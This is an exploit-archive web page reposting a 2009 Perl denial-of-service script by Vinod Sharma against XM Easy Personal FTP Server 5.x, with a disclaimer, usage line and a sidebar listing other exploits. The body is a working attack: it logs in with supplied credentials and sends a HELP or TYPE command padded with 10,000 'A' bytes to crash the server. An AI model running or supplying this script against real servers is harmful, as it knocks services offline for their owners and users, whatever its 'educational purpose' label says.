首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Denial of service exploit for the XM Easy Personal FTP Server
来源:vinodsharma.mimit[at]gmail.com 作者:Sharma 发布时间:2009-06-11  
#!usr/bin/perl -w

#######################################################################################
#   XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service
#   via a "HELP" or "TYPE" command with an overly long argument.
#   Refer:
#        												http://secunia.com/advisories/35271/
#        Original advisory avaiable at:	http://securitygyan.com/2009/06/09/xm-easy-personal-ftp-server-help-and-type-command-rdos-exploit/
#		  Product link:	http://www.dxm2008.com/
#
#$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$
#
#        Author:    Vinod Sharma
#        Email:     vinodsharma[underscore]mimit[at]gmail.com
#        Blog:       http://securitygyan.com/
#        Date:      09th june, 2009
#        
#
###Thanks all the Security Folks###
########################################################################################

use IO::Socket;

my $server_ip=$ARGV[0];
my $server_port=$ARGV[1];
my $username=$ARGV[2];
my $password=$ARGV[3];
my $command=$ARGV[4];
my $buffer=$command ." " ."\x41" x 10000 ."\r\n";          

if(($#ARGV + 1)!=5)
{
				print "\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n";
				print "\nargument command can have a value HELP or TYPE\n";
				print "\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP";
				
				exit;
}
				

$socket = new IO::Socket::INET (PeerAddr  =>$server_ip,  PeerPort  => $server_port, Proto => 'tcp', )   or die "Couldn't connect to Server\n";

                              
while (1)
{
	
    $socket->recv($recv_data,1024);
    print "RECIEVED: $recv_data"; 
    
	$send_data1 ="USER ".$username."\r\n";
    $socket->send($send_data1);
    $socket->recv($recv_data1,1024);
    print "RECIEVED: $recv_data1"; 
	   
	   $send_data2 ="PASS ".$password."\r\n";
       $socket->send($send_data2);
	   $socket->recv($recv_data2,1024);
        print "RECIEVED: $recv_data2"; 
		
		
       $socket->send($buffer);
	   print "\nAttack is send.....................\n";
	   $socket->recv($recv_data3,1024);
        print "RECIEVED: $recv_data3"; 
        
		close $socket;
         
  }    
    

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Open Biller 0.1 (username) Bli
·phpMyAdmin /scripts/setup.php
·LightNEasy sql/no-db <= 2.2.x
·DX Studio Player < 3.0.29.1 Fi
·Sniggabo CMS (article.php id)
·phpMyAdmin (/scripts/setup.php
·Sniggabo CMS (article.php id)
·Joomla Component com_vehiclema
·Apple iTunes 8.1.1.10 (itms/it
·Joomla Component com_realestat
·Zip Store Chat 4.0/5.0 (Auth B
·MRCGIGUY Hot Links (report.php
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved